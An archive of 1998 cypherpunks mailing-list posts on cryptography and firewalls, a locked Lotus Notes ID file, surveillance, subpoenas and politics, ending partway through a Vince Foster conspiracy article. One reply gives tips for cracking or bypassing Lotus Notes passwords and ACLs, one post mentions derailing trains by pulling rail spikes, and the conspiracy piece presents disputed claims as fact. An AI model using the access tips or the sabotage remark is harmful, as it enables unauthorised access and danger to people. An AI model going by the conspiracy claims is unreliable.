measure".  Let's just say that your comment brought to mind certain unnamed
persons who have done this.

However, I believe you missed my points in several other areas, so I will
try to clarify what I was saying.  Out of courtesy to the numerous lists we
are cross posting to, after your next response, if any, I suggest we take
this off list.

At 12:13 PM 10/28/98 -0500, Steve Bellovin wrote:
>In message <3.0.1.32.19981028093825.00a3f2d0@pop.bos.platinum.com>, Hal
Lockhar
>> 
>> I hear you saying, "but what if the guy is trying to break into my system."
>>  I would argue, that if you are using strong cryptographic authentication
>> (whether his identity can be mapped to a human being or not) then either 1)
>> he will fail, in which case you don't care or 2) he will succeed, in which
>> case he must have used some technique like stealing a key which cannot be
>> detected by monitoring.
>
>Why do you assume that the flaw that lets the bad guy in is cryptographic?
>I recently analyzed every CERT advisory ever issued.  85% of them
>described problems that crypto couldn't fix.  Buffer overflow is the
>culprit du jour, but it's hardly the only one.  (This year, the prize
>for second place -- admittedly a distant second -- went to crypto modules.)

I never said that the flaw was cryptographic.  The idea I was trying to
express was that are two cases:

1) (Today) Let in unauthenticated or weakly authenticated users.  There is
a (relatively) high probability that they are attackers who will try to
exploit some weakness like a buffer overflow. In this case it is useful to
observe their application level traffic in order to detect this or learn of
the existence of the new crack they are using.

2) (Future) Allow only strongly authenticated users.  Either a) they are
legitimate users whose identity is known and will presumably not try to
hack the system, or b) they are attackers who have done something like
steal the key of a legitimate user.  In the later case, I admit you might
want to see what they are typing, but it will not give you any information
about the underlying problem -- their ability to obtain unauthorized keys.

>> I raise this point, because I see it as part of a current trend to resist
>> stong security measures in preference to weak ones.  The current industry
>> facination with weak measures, like firewalls and intrusion detection
>> systems has caused some people to resist the introduction of strong
>> measures, such as cryptographic authentication and data protection.  The
>> most popular example of this is the foolish practice of putting an SSL
>> server, with its vital server private key, outside the firewall in a DMZ.  
>
>That's only a flaw if you assume that there are other weak points on
>the Web server that a firewall can protect.  If you lock down the host
>so that only port 80 is exposed (and maybe a cryptographically protected
>administrative port), what good does the firewall do?  The weakest point
>is probably the CGI scripts, and those have to be exposed in any event.

I agree with that. It is amazing to me how many people enable crypto like a
talisman without locking down the rest of the system.  

However, my point was that as I understand the theory behind a DMZ, you put
systems there that you think might get overrun.  You do not put the
mainframe that runs payroll in the DMZ. Yet, I assert, the server private
key, which represents the identity of the organization ought to fall in
under the same classification and receive the same protection. (Its
actually worse than I indicated, since if you want your server to restart
without human intervention, you generally have to put the pass phrase in a
script file or something.
 
>> But I have also heard system administrators protest the introduction of
>> cryptographic solutions because some current half measure will no longer
>> work.  There are even misguided individuals who have proposed putting
>> master decryption keys at vulnerable locations like border routers, so that
>> messages can be inspected in the fly.
>
>There are no panaceas, there is no single technology (and that emphatically
>includes crypto) that will solve this problem.  Defense in depth is our
>best hope, which means firewalls plus crypto plus IDS plus better operating
>systems and programming languages.  Most of all, it means engineering a
>solution -- making the right set of tradeoffs, even if unobvious.

Agreed.  I have no problem with defense in depth.  Only, as I said,
limiting the use of a strong technique because it interferes with the use
of a weak one.

>Let me give an analogy.  On most electrical equipment, the ground pin
>is useless -- *unless* there has been another insulation or air gap
>failure within the device, a failure that would render the frame "hot".
>But because of the ground pin, such a failure will instead short the
>hot lead to ground, tripping the breaker.  It thus takes two failures
>to electrocute someone.  *But* -- toasters and other devices with
>exposed heating elements don't use this technique.  Why not?  Well,
>with an exposed electrode, the probability of direct contact with a live
>wire is much greater.  And if you ground the frame of the toaster,
>there's now a direct, high-quality path to ground that in turn is
>in contact with the other hand of the poor fool who is poking at a
>piece of bread with a fork.  In other words, what's a safety mechanism
>in your refrigerator is a danger in your toaster -- and sometimes,
>that can be true of crypto as well.

I guess I don't see the case where the use of crypto decreases security,
except if a mis-design causes complacency.  In my mind, strong security
begins with strong (cryptographic) authentication. [Calm down Bob, I am not
ruling out non-biologic identities.]  If we have authentication, we can
have access control, audit trails, etc.  We can certainly add heuristic
measures like firewalls and IDS and potentially detect additional problems.
 However, I have met more that a few people who want to play with an IDS
because it is cool, rather than go through the hard and unsexy work of
locking down their systems.

>For another analogy, think of insecurity as entropy.  You can't destroy
>it, but you can move it around.  

Do you have any evidence for this remarkable assertion?  It sounds like a
council of despair to me.  Are you saying that no matter what we do or how
much we spend, we can not make systems more secure.  Say it ain't so!

>Using crypto moves the problem from
>the (in)security of the links to the (in)security of the keys.  If
>you can't protect your keys -- and that generally takes much more than
>crypto -- using cryptography hasn't bought you anything.

I agree that as we raise the bar, new attacks become the weakest link, but
that does not mean you have not increased security. The new weakest links
are no weaker in an absolute sense. 

A better analogy is computer performance improvement.  If we speed up the
current bottleneck, something else becomes the bottleneck, but that doesn't
mean the system won't run faster.

The practical reality of the Internet today is best illustrated by the
story of the hikers and the mountain lion.  When the hikers encounter a
mountain lion one begins to tie on his running shoes.  The other says "you
can't outrun him with or without running shoes."  The first answers "I
don't have to outrun him, just you."

The serious hackers don't waste their time trying to break into AT&T, they
pick some place easier. (like the CIA ;-)

Regards,

Hal

====================================================================
Harold W. Lockhart Jr.               PLATINUM technology
Chief Technical Architect            8 New England Executive Park
Email: Harold.Lockhart@platinum.com  Burlington, MA 01803 USA
Voice: (781)273-6406                 Fax: (781)229-2969
====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 29 Oct 1998 06:56:34 +0800
To: cypherpunks@Algebra.COM
Subject: cypherpunks@algebra.com moving
Message-ID: <199810282219.QAA12641@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



This list will move to another machine tonight because it is relocating
to another colocated server.

It has nothing to do with subpoenas.

Hopefully things will work transparently, but if they do not, write me
to ichudov@yahoo.com (there is a possibility that all algebra.com
may be shut out of mail).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman@iris.com
Date: Thu, 29 Oct 1998 07:02:21 +0800
To: cypherpunks@toad.com
Subject: Re: lotus notes id file
Message-ID: <852566AB.00799CCF.00@arista.iris.com>
MIME-Version: 1.0
Content-Type: text/plain




>    I'm using lotus notes and I have a big problem. I have a id file with
no
>password. How can I get a password for it or reset it. Is there some type
of
>utility or something someone knows of?I have been told that I'm out of
luck
>unless I have the original.

I assume you mean the ID file has a password, but that you have forgotten
it. Notes uses your password as an encryption key and encrypts the ID file.
There is no utility existing or possible that can reconstruct the ID file
without knowing the password. There is a company called AccessData
Corporation in Lindon, Utah that claims to have written a utility that will
do a brute force search guessing large numbers of passwords and trying to
verify each guess. If you have a vague recollection that you didn't pick
your password very carefully, they might be able to help you. I have no
experience with the company and have no idea what they charge, whether they
actually provide this service, or indeed whether they still exist.

Otherwise, your system administrator can create a new ID file for you. That
will work fine except that if you have any data encrypted under your key
(e.g. you received any encrypted email), that data is forever lost. Notes
System Administrators at sites where people use encryption are strongly
encouraged to have a backup strategy for archiving ID files for just this
eventuality. You might ask whether he did so, and encourage him to do so in
the future if not.

[Note: the tradeoff between protecting the privacy of employees from nosy
system administrators and bailing them out when they forget their passwords
is a sensitive one. People have strong opposing views on what's "right".]

Good luck.

     --Charlie Kaufman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Diederik Smets" <Diederik.Smets@emd.be>
Date: Thu, 29 Oct 1998 00:57:31 +0800
To: cypherpunks@toad.com
Subject: Re: lotus notes id file
Message-ID: <412566AB.00566188.00@mailhost.emd.be>
MIME-Version: 1.0
Content-Type: text/plain



IF the owner of the id also entered an internet password AND it is the same
as the one for the id file, then you can use brute force (dictionairies) to
try and crack it. Get the encrypted value in the
properties>fields>HTTPPassword of the persons document in the PNAB and
compare it to the results of the @password() function.

Alternatively, do a search for old id files which might still be accessible
with the 'default' password (if you know which one that is), but you won't
be able to access servers that have the 'check password' option enabled.

If you need to access a local DB that has 'enforce a consistant ACL across
all replicas' enabled, just use another id and add that person's name with
the necessary roles to the ACL via LotusScript.

Diederik


Hello
     I'm using lotus notes and I have a big problem. I have a id file with
no
password. How can I get a password for it or reset it. Is there some type
of
utility or something someone knows of?I have been told that I'm out of luck
unless I have the original.

John...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 08:15:09 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: An interesting set of observations... [fwd]
Message-ID: <199810282358.RAA16130@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Oct 1998 14:30:32 -0700

> Southerners are extremely patriotic. Isn't a foreign army in the world could
> invade the South, take it and hold it without fighting partisans in every
> nook and corner!

> >Lost the war but won the peace!
> 
> Lost the war and lost the right of the States to determine for themselves
> how they would be governed. Won a strong central government, a huge social
> welfare problem and income tax. Sure looks like a clear cut victory to me!


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 08:17:34 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Another interesting observation...
Message-ID: <199810290002.SAA16193@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Oct 1998 16:21:21 EST

> Excuse me!  The S. L. A. Marshall study to which you refer; the one that
> slammed the American Army infantryman for not firing, has been debunked as
> based on pure fantasy by no less a person than SLAM;s #2.  Training does work
> and ammunition depletion was a problem for front line units.
> Although I an now guilty of failing to meet Pauls request to take this strain
> private, as a damn Yankee :-),  I strongly protest comments by by people
> outside the family on this whole GD, err GC, subject.  For the record, if your
> country has a history of dictatorship in this century, you need to research
> your own history, like the government death squads so prevalent SOB.  As to
> our distant northern cousins, you still have government censorship of the
> press, a draconian official secrets act, and border police who stop and search
> any US car with an NRA decal that has the temerity to cross into Canada.
> In 2 weeks, those of us who remember, celebrate Veterans Day, once known as
> Armistice Day.  So when you choose to rag on the US, remember Bois de Belleau,
> Chateau Thierry, Bastogne, and keep a moment of silence for the gun crazy
> Americans who gave their last full measure of devotion.
> 
> Rant off.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:19:33 +0800
To: cypherpunks@toad.com
Subject: 1999 U$ budget for facial recognition
Message-ID: <199810281733.SAA00537@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




The committee recommends an increase of $5.0 million for the facial
recognition technology program. 


http://www.dp.hq.af.mil/DP/dprc/SENREPT.HTM

Report to Accompany


S. 2060


The Department of Defense Authorization Bill
for Fiscal Year 1999

(large document)






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:25:14 +0800
To: cypherpunks@toad.com
Subject: cypherpunk fashion accessories
Message-ID: <199810281733.SAA00557@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 A piece of luggage in the form of an attache case is equipped
with destruct means for destroying the contents therein in response to an
intentionally given signal. The interior of the case comprises a
compartment in the form of a metallic box with a cover, which box when
closed serves as a combustion chamber to incinerate the contents therein
when so desired. Fuel and electric igniter means are placed within the box
and ignition current is supplied by a power pack housed in the attache
case. A heat insulation barrier surrounds the box and prevents transfer of
combustion heat to the walls of the attache case. The circuit
interconnecting the electric power pack and the igniter means includes a
number of normally open switches arranged in series; all of which must be
closed to initiate and start the destruct cycle. One switch is closed in
response to closure of the attache case, and others may be deliberately
closed by key means or the like. The final switch is closed by a pushbutton
in the vicinity of the attache case handle, whereby the carrier of the case
may set off the destruct cycle by manipulating the pushbutton with a finger
of the hand around the handle. 

http://www.patents.ibm.com/details?pn10=US03643609








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:08:22 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: MIB Subponeas (fwd)
Message-ID: <199810281733.SAA00570@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



1. You have the option of telling them to leave your property at
once (if you can pull this at work, e.g., if you're the boss).

2. You do not have to identify yourself when asked, unless
you're driving a car in public.  You do not have to accept a subpeona.  

Uncertified postal mail is datagrams and its surprising how many
e.g., jury notices are dropped.

I remember my dad sending me to tell the man who drove up to the
house (to serve my dad, a lawyer) to get lost.  Pretty cool thing 
for an 8 year old to do.

If you have the presence of mind to remember these things, you can
at least get advance notice, and send your blue dress to the cleaners.

At 04:56 PM 10/27/98 -0600, Jim Choate wrote:
>The only issue that took me by
>surprise was two officers showing up at work unannounced. It took me till
>the next day to burn off the heeby-jeebies from that.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:19:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810281735.SAA00677@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:35 PM 10/27/98 -0800, Michael Motyka wrote:
>> Most of nature is a very high quality vacuum, actually.
>>
>Yup, I did my 100hrs of Physics, Chemistry and Math too. I like the way
>the 'vacuum' behaves near very hi-Z nuclei.

Fine, lets get into vacuum energy, but not waste cpunk time.


>More interesting, though, is this: why would a block cipher use key bits
>rather than an LFSR to do input or output whitening? Is it strictly a
>performance issue? Is it proven that doing this doesn't leak key bits in
>some way?

Shift registers are cracked.  Good ciphers haven't been.  (Love
tautologies.)  

Traditional block ciphers are expensive bleach, take note.
Unnecessary.  










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:22:42 +0800
To: cypherpunks@toad.com
Subject: airline id
Message-ID: <199810281736.SAA00715@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 12:43 PM 10/27/98 -0800, Joel O'Connor wrote:
>you flew to.  Even with trains, all's it will take is one bomb and you
>better believe security will be pumped up as high as it is with
>airlines. 

Naaah, you pull rail-spikes to get trains, no big ba-da-boom required.
And it does happen.














  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:20:20 +0800
To: cypherpunks@toad.com
Subject: personal tracking
Message-ID: <199810281738.SAA00830@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




http://fotlan5.fotlan.army.mil/STRATEGIC/appa.html

TITLE: Tracking and Reporting System (TRS)
OBJECTIVE: To conceive, design, implement, and develop a small
(vest-pocket-size) satellite transceiver that can be overtly (and possibly
covertly) affixed to personnel, vehicles, or goods in transit for the
purpose of tracking and position reporting of the host. 








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 11:20:36 +0800
To: cypherpunks@cyberpass.net
Subject: cohen predicts army patrols US streets
Message-ID: <199810290249.SAA20979@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




Date: Tue, 27 Oct 1998 15:42:55 -0700
From: Bill Mee <bmee@ccs.lmco.com>
Subject: Cohen Predicts Army Will Patrol US Streets

Sorry no URL on this--the following was copied from the 
FreeRepublic website 

DOD BILL COHEN WARNS OF US TERRORISM . . . 

Army Times 10-22 Staff /Wire Reports 

***US ARMY WILL PATROL U.S. STREETS . . .
An Interview with Secretary of Defense Bill Cohen 
. . .in the Army Times.*** 

>From Staff and Wire Reports The Times of Arkansas, Texas 
and Louisiana: US Defense Secretary Predicts the Army 
Will Patrol US Streets 

"Terrorism is escalating to the point that Americans soon 
may have to choose between civil liberties and more 
intrusive means of protection," says Defense Secretary 
William S. Cohen 

The nation's defense chief told the Army Times he once 
considered the chilling specter of armored vehicles 
surrounding civilian hotels or government buildings to 
block out terrorists as strictly an overseas phenomenon. 

But no longer. 

"It could happen here," Cohen said he conclued after 8 
months of studying threats under the Pentagon microscope. 

Free-lance terrorists with access to deadly chemical and 
biological bombs are "going to change the way in which the 
American people view security in our own country," he 
predicted in a Sept 10 interview. 

Cohen is calling for the government to step up its efforts 
to penetrate wildcard terrorist organizations. 

"It's going to require greater intelligence on our part -- 
much greater emphasis on intelligence gathering capability 
- - - more human intelligence, and it's going to take more 
technical intelligence," he said. 

But using the U.S. military in a domestic law enforcement 
role would require revisions to laws in force for more 
than a century, cautions Shreveport attorney John Odom, 
Jr. 

"You can't do it from the Defense Department side unless 
Congress dramatically revises the Posse Comitatus laws." 
said Odom, a colonel in the U.S. Air Force Reserve and a 
reserve Judge Advocate. 

"The 1878 law specifically prohibits the use of the 
military in domestic law enforcement unless authorized by 
Congress or the Constitution and does not wllow for 
military intervention through action by the Secretary of 
Defense of even an Executive Order from the President," 
Odom said. 

We're trained from the first day of Judge Advocate school 
to think of Posse Comitatus !!! said Odom. "If Secretary 
Cohen is suggesting that the Department of Defense be 
involved, it may be part of a legislative package, but it 
will not happen unilaterally without a lot of folks 
thinking long and hard about it." 

Cohen said terrorism would be a top priority in 5 new 
areas he plans to focus on now that he has wrapped up his 
first defense budget, the quadrennial review of the 
military and a new 4-year defense strategy. 

Other goals include modernizing the military, improbing 
troops housing and other benefits, streamlining the 
defense bureaucracy and shaping new military relationships 
and contracts across the globe.


- - --------------DCC19197C8214DDB42B1B018--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 02:43:57 +0800
To: cypherpunks@cyberpass.net
Subject: one lump or two
Message-ID: <199810281803.TAA03396@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>(e.g. # Uses/Side Effects/Precuations/Interactions/etc.)
>
>I'd like info on Zoloft, Zestril, Lithium, & Deprecote (?sp) - orange-ish
>liquid capsules - ... and Tegretol and Respiradahl (?sp)

Depekote and Tegretol are anti-seizure drugs now being used
for certain kinds of bipolar conditions.  

Zoloft is like prozac but has also a mild stimulating effect.

Lithium is a classic anti-bipolar drug.

Li, Depekote, probably Tegretol you have to watch blood levels
even after stabilization.

They probably think he's manic and or depressed, if he's
been coherent and dumbed-himself-down enough to avoid
a psychotic or schizoform diagnosis.  Shrinks don't like rants, especially
ones they don't understand.

















  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Thu, 29 Oct 1998 11:40:45 +0800
To: cypherpunks@cyberpass.net
Subject: California Court decision on freedom of association
Message-ID: <19981029031629.26946.rocketmail@send105.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



In re DAVID A. ENGLEBRECHT, JR., on Habeas Corpus. 


No. D030992 

In the Court of Appeal of the State of California 

Fourth Appellate District 

Division One 

(San Diego County Super. Ct. No. N76652) 

PETITION for writ of habeas corpus following contempt finding by
Superior Court of San Diego County for willfully violating two
provisions of a preliminary injunction. John S. Einhorn, Judge.
Petition granted in part and denied in part. 


COUNSEL
 Steven J. Carroll, Public Defender and DawnElla Gilzean, Deputy
Public Defender, for Petitioner. 

 Paul J. Pfingst, District Attorney, Thomas F. McArdle and Anthony
Lovett, Deputy District Attorneys, for Respondent. 

Filed October 26, 1998 


 In this proceeding, we are asked to decide the constitutionality of
two provisions of a preliminary injunction, which prohibit: 

 " Standing, sitting, walking, driving, bicycling, gathering or
appearing anywhere in public view with any other defendant herein, or
with any other known Posole [gang] member" and 

 " Using or possessing pagers or beepers in any public place." 

 We find the non-association provision is constitutional, but the
restriction on pagers and beepers is not. 






_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@idsi.net
Date: Thu, 29 Oct 1998 09:21:07 +0800
To: Ulf Mller <ulf@fitug.de>
Subject: Re: Using a password as a private key.
In-Reply-To: <m0zYdlv-0003b7C@ulf.mali.sub.org>
Message-ID: <Pine.LNX.3.96.981028190420.19421D-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 28 Oct 1998, Ulf [iso-8859-1] Mller wrote:

> I don't like the idea though. You're giving everybody the chance to
> run a password guessing attack on your secret key.

That was my first objection too..

But the only thing stopping an attacker from running the same attack
on my PGP key is that they don't _have_ my PGP key.. a non-issue
for a dedicated attacker. My 1024 bit private key could be had fairly
easily, it would entail hacking my PC, or stealing.. whatever. Now
they run a password cracker.

In the case of the private key being generated from a passphrase, hacking
my PC, or stealing it, does them no good .. my private key isn't there ..
(ok, maybe it is.. data remanence is a pain in ass.. but you get the
point). 

Lastly .. I am not too familiar with elliptic curve crypto, but it seems
to me that running a cracker on a phrase, and then generating the private
key from it or trying signatures is going to be more CPU intensive than
doing a few blocks of IDEA or CAST, so it would seem to follow that this
scheme is stronger in preventing an intelligent search of the passphrase.

Michael J. Graffam (mgraffam@idsi.net)
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:28:11 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Electronic March
Message-ID: <199810290400.UAA14741@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Electronic March
Date: Tue, 27 Oct 1998 21:58:52 -0600
To: believer@telepath.com

   ELECTRONIC MARCH

     A US grass-roots group has kicked off the Billion Byte March, calling
itself the first Internet march on Washington. The aim is to send a million
emails to Congress in January, on the day of the State of the Union
Address. Why? To reform America's social security system. See
http://www.march.org  
  


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:28:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Crypt Wars, UK-Style
Message-ID: <199810290400.UAA14769@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Crypt Wars, UK-Style
Date: Tue, 27 Oct 1998 21:59:31 -0600
To: believer@telepath.com

   CRYPT WARS, UK-STYLE

     UK's Privacy International has awarded the Department of Trade and
Industry a Big Brother award for its contribution to invading privacy. The
DTI wants all companies offering encrypted services to be licensed, which
means using a third party holding keys to the user's encryption code.
Encryption licensed outside the UK will not be recognised, and thus would
not be protected by law. And only the recommendation of senior police is
needed to get a key - users aren't allowed to know if their key has been
given to the police. More Big Brother awards at http://www.privacy.org/pi/  


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:29:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: No dirty trick, just a computer program let loose
Message-ID: <199810290400.UAA14790@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: No dirty trick, just a computer program let loose
Date: Wed, 28 Oct 1998 10:36:35 -0600
To: believer@telepath.com

Source:  Fox News - AP

No dirty trick, just a computer program let loose
 10.50 a.m. ET (1551 GMT) October 28, 1998

 GREENBURGH, N.Y. (AP) - When their phones rang in the middle of the night
this week, many residents expected the worst. 

 Death in the family? Fire? 

 No, just the bureaucratic tone of town supervisor Paul Feiner's taped
voice, advising of a change in local trash pickup times. 

 Couldn't this have waited until morning? 

 "I thought it was a member of my family,'' said Barbara Merriwether, 52.
"I thought something was wrong.'' 

 The timing of the 300 calls, of course, wasn't intentional. Someone at the
police department had forgotten to turn off an automated calling program
Monday evening, and the system ran through the night. 

 The only bad news in the affair may be for Feiner, who is trying to unseat
incumbent Republican Benjamin Gilman in the 20th Congressional District.
Feiner said may throw a party - with his own money - for everyone who was
called after 9 p.m. 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:39:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: New Evidence Exposes Vince Foster Murder
Message-ID: <199810290400.UAA14809@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: New Evidence Exposes Vince Foster Murder
Date: Wed, 28 Oct 1998 11:07:35 -0600
To: believer@telepath.com

Source:  Washington Weekly
http://www.federal.com/oct26-98/Story01.html

New Evidence Exposes Vince Foster Murder 
Victim Not Shot With .38 Caliber Revolver 

 By WESLEY PHELAN 

 Vince Foster, Deputy White House Counsel early in Bill Clinton's first
term, was found
 dead in Fort Marcy Park on July 20, 1993. Three investigations into
Foster's death,
 including one by Independent Counsel Kenneth Starr, have ruled the death a
suicide.
 Patrick Knowlton, referred to as "C2" in Starr's Report, entered Fort
Marcy Park
 approximately 70 minutes before Foster's body was discovered. Evidence
shows that
 Foster was already dead at that time. Knowlton saw two vehicles in the
parking lot,
 neither of which matched the description of Vince Foster's 1989 silver-
gray Honda. 

 In the spring of 1994, FBI agent Lawrence Monroe interviewed Knowlton for the
 Office of regulatory Independent Counsel Robert Fiske. Knowlton learned in
October
 of 1995 that his statements to Monroe were falsified in the FBI interview
report.
 Shortly thereafter Knowlton received a secret grand jury subpoena from
Independent
 Counsel Kenneth Starr, who was conducting the third investigation into
Foster's death.
 That same day several men began to harass Knowlton in the streets of
Washington,
 D.C. 

 John Clarke, attorney for Knowlton, filed suit in U.S. District Court in
Washington
 D.C., claiming the harassment was a violation of Knowlton's civil rights
[1]. The suit
 alleges the harassment was part of a larger conspiracy to cover up the facts
 surrounding Vince Foster's death. 

 On Wednesday of last week Clarke filed an amended complaint in the suit,
adding
 several new defendants [2]. The most striking paragraph in the complaint
states: 

Facts 

26. On July 20th, 1993, between the time of 3:00 p.m. and 4:00 p.m.,
Vincent Foster died of a small-caliber gunshot wound to his head, at the
hand of another. The bullet entered his head from the upper portion of
the right side of his neck, under the jaw line, passed upward through the
body of the tongue, pierced his brain and struck the skull approximately
three inches below the top of the head, fracturing it. The bullet remained
in his head. Blood drained from the entrance wound in the neck onto his
right collar and shoulder and was absorbed down onto his right
shirtsleeve. Blood also accumulated in his mouth. 

 This statement of facts, which runs counter to the results of three
official government
 investigations, is a very bold gambit by Clarke. Under Rule 11 of Federal
Civil
 Procedure, for an attorney to make irresponsible assertions of fact before
a court
 opens him to severe sanctions by the judge. In the following interview,
conducted on
 October 21, John Clarke discusses with The Washington Weekly the
compelling new
 evidence supporting his statement of facts. 

QUESTION: You filed an amended complaint today on behalf of Patrick
Knowlton, correct? 

CLARKE: Yes, we have named some additional defendants in the case.
We also have more of the facts in the case. 

QUESTION: Why was there a need to file an amended complaint? 

CLARKE: Amending the complaint is the usual course of events in
lawsuits. As a party learns more things the lawsuit gets changed. That is
particularly true in a conspiracy case. Conspiracies by their very nature
are secret. Our job is to try to unravel the conspiracy and that means
bringing new facts to light. We have done that, so it became necessary
for us to amend our complaint. 

QUESTION: Who were the original defendants in the case? 

CLARKE: The original defendants were the people who harassed
Patrick, including two individuals whom we named. There were two FBI
agents named, one of whom falsified reports, and the other whom we
believe was involved and knew in advance of the intimidation that Patrick
suffered. 

QUESTION: Who falsified documents? 

CLARKE: Larry Monroe, one of the FBI agents who was assigned to
Robert Fiske's office. He interviewed Patrick in the Foster death
investigation, and falsified Patrick's statements in his report. Later on the
truth surfaced in the London Sunday Telegraph. Foster died on July 20,
1993. Nine months later Monroe interviewed Patrick twice. Eighteen
months after that the 302's were public. Ambrose Evans-Pritchard was
following the case, but Patrick had never heard of Ambrose. Ambrose
contacted Patrick and showed him the 302's, that Patrick said lied about
what he had told the FBI. So Ambrose wrote an article that appeared in
the October 22 edition of the London Sunday Telegraph. That appeared
on U.S. newsstands on October 24th, a Tuesday. That same day the
Office of Independent Counsel prepared a subpoena for Patrick to testify
before the Whitewater grand jury the following Wednesday. They typed
it up on a Tuesday for testimony a week from the following day. But they
didn't serve it right away. They waited until Thursday, October 27th to
serve it. And that was the beginning of the intimidation Patrick suffered. 

We believe this intimidation was a civil rights violation, to intimidate a
federal witness in order to dissuade him from testifying fully, fairly, and
truthfully. We filed suit based on that. We also believe this civil rights
